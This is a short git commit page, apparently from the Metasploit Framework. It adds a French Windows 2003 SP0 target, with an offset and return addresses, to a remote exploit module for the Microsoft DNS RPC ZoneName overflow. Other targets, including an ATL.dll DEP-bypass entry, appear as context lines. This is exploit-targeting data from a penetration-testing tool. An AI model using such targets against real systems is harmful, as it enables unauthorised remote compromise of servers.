add french target for win2003 SP0
git-svn-id: file:///home/svn/framework3/trunk@4724 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d1e876703f
commit
29f850131d
|
@ -68,6 +68,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
|||
|
||||
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
||||
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
||||
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
|
||||
|
||||
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
|
||||
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
|
||||
|
|
Loading…
Reference in New Issue